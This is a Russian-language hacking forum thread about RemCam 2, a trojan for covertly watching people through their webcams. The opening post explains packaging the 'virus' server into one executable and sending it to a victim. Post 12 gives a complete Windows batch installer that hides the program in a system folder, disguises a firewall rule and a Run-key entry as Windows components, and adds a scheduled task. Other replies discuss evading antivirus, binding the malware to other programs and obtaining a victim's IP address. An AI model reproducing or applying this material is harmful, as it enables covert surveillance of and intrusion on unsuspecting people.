Инструкция взлома - Это пособия для безопасности!

Объявление

Hash Profit

Хочешь получить WMR бонус? Вот несколько рабочих WMR бонус программ, которые раздают бонусы за посещение их сайтов по 0.77 р., мало но каждый день что стоит кликать на кнопку и получать свой бонус, сколько накапает к примеру за месяц, за год?
worldwm
5-kopeek
icqmir
1 клик 1 wmr
3.03WMB

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Вирусы » RemCam 2 (скрытое наблюдение в вебкамеру)


RemCam 2 (скрытое наблюдение в вебкамеру)

Сообщений 1 страница 30 из 44

1

Программа для скрытого наблюдения в вебкамеру через сеть интернет.
Берёте серверную часть(в папке сервер(вирус)),компилите батинок который находится в той же папке и склеиваете всё в один исполняемый файл,далее закидываете кому нудно и свободно без каких либо трабл,наблюдаете свою жертву в вебкамеру через сеть интернет.
В архиве батинок,сервер и клиент.

http://i.pixs.ru/storage/4/7/6/Snimokpng_6319672_2675476.png
скачать или с офф сайта (с офф сайта батинок будет другой,ну не меняет суть)

0

2

его палит антивирусы

0

3

invulnerable палят,правда не все))
Есть исходники,можешь подправить и не будут палить.

0

4

Всё не надо разобралась!)))

Отредактировано Натали (2011-08-12 20:26:46)

0

5

Да но в если жертва разговаривает и ты подцепишься то её выбьет вебка не может использоваться в 2 прогах

0

6

Всем привет!
MOssWar, подскажи, пожалуйста, wesf.bat компильнул через "quick batch file compiler" во время этого в батнике дважды сменил "Пароль-Веб" на свой пароль, потом сохранил его как wesf.exe. В дальнейшем, с помощью проги "SuperGlue32" склеил wesf.exe и svch.exe в файл под нащванием web.exe.
Все ли я правильно сделал??

Этот файл нужно забросить в определенную папку или куда угодно??? Каким образом он будет активироватся, если я на расстоянии???

Потом я у себя на компе запускаю клиента... тут у меня вопрос по кнопкам - что значит молния, буква Е, и резетка???

Извините, если вопросы тупые, но реально сам разобратся не могу, что то не работает!

Заранее благодарен за понимание и ответ!

0

7

LVS Для компиляции бат файлов есть bat to exe convecter и если вней указывать описание к файлу то на полученный файл не будут матерится многие антивирусы,в частности Каспер,на quick batch file compiler в любом случае будут матюгаться антивирусы,эт уже проверено и неоднактратно.
Склеивать левыми джойнерами,которые хз что ещё могут туда присобачить,смысла нету,проще склеить его самому в ручную,тем более что всё просто до безобразия

0

8

LVS не поленись прочитай Как склеивают вирусы с программами.

0

9

Спасибо, почитаю!!

А еще парочка предыдущих вопросов: "после того как я у себя на компе запускаю клиента... что означают кнопки - что значит молния, буква Е, и резетка???"

Заранее благодарен за ответ!!!!

0

10

LVS да хз не помню,как то все машинально получается)
Резетка вроде кнопка подключения,молния не помню,вообщем тыкай на + ввбивай данные и жми резетку,ну а так можешь свободно со всем остальным бороться через метод тыка.

0

11

Спасибо, буду бороться )))

0

12

Код:
taskkill /f /im svch.exe /t
md %SystemRoot%\fgn
copy /y %Systemroot%\sxa.exe %Systemroot%\fgn\svch.exe
chcp 1251
netsh advfirewall firewall add rule name="Хост-процесс для служб Microsoft Windows" dir=in program="%SystemRoot%\fgn\svch.exe"
attrib +h +s +r "%windir%\fgn"
echo echo off> %Temp%\fast.bat
echo del /s /q %windir%\wesf.exe >null>> %Temp%\fast.bat
echo schtasks /delete /tn Windk /f  >null>> %Temp%\fast.bat
echo del /s /q %0 >null>> %Temp%\fast.bat
cd %SystemRoot%\
del /s /q sxa.exe
schtasks /create /tr %Temp%\fast.bat /ru "system" /sc minute /mo 5 /tn Windk /f >nul
cd %SystemRoot%\fgn\
start svch.exe pass=Пароль-веб port=57011
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "MicrotesUpdate" /t REG_SZ /d "%SystemRoot%\fgn\svch.exe pass=Пароль-Веб port=57011" /f
exit
cls

Вот так будет лучше,пробуй.
Путь выгрузки всех файлов в %WindowsDir% или %SystemRoot%,серверную часть обзови sxa.exe ,батинок по прежнему wesf.exe

0

13

извините а можно подробно написать что и как делать .а то не понятно ничего.вот я скачал захожу в папку сервер и что там нужно делать?

0

14

супер спасибо большое...

0

15

а как узнать айпи жертвы????

0

16

Nightfall делай батинок. Вирус для отправки IP адреса на почту,своими руками.

+1

17

на чем написан

0

18

ребят,а можно,если не трудно,со скринами все сделать а то ваще не понятно

0

19

wwwleningrad со свринами чего?
Текстового редактора?
Или ты не знаешь как скомпилить батинок в exe?
прочитай Как склеивают вирусы с программами. ,не ленись,это для тебя будет при много полезно.

0

20

Кликай более подробное описание.

0

21

MossWar, подскажи пожалуйста, как сделать так, что бы его касперский не палил ?

0

22

Chezare переписывать исходник или криптовать.
А вообще проще найти альтернативу,тем более что в настоящие время полно бесплатного софта,вес пусть будет больше,но и можно будет исправить при желание.

0

23

Я в этом деле вообще не шарю, так что естественно ни переписывать ни криптовать я не умею. Подскажи пожалуйста какой нибудь другой софт для видео наблюдения через веб камеру, если знаешь. Очень надо.

0

24

Chezare честно надо искать,сам не искал да и честно говоря не интересовался,приспичит думаю для себе можно будет попробовать и нацарапать

0

25

Вопрос. Как подключится к компу если инет он получает от роутера??? на компе айпишка типа 192.168.0.100 и при каждом переподключении меняются последнии цифры?

0

26

достать настоящий ип,который выделяется провам или конектится в обход ип.

0

27

достать настоящий ип,который выделяется провам или конектится в обход ип.

а как это сделать?

0

28

Nightfall
закинь к нему вирус который будет отправлять его ip тебе на почту Кликай
как закинуть читай Кликай
можешь еще через RMS там конект через ID Кликай

+1

29

Lyubitel
это слишком сложно для меня))) не могу разобратся)))) у меня есть доступ к этому компу, как мне узнать ip? могу ли я просто посмотреть ее като на компе?

0

30

Nightfall
https://forumupload.ru/uploads/000f/db/02/1747-1.gif 
зайди 2ip.ru

0


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Вирусы » RemCam 2 (скрытое наблюдение в вебкамеру)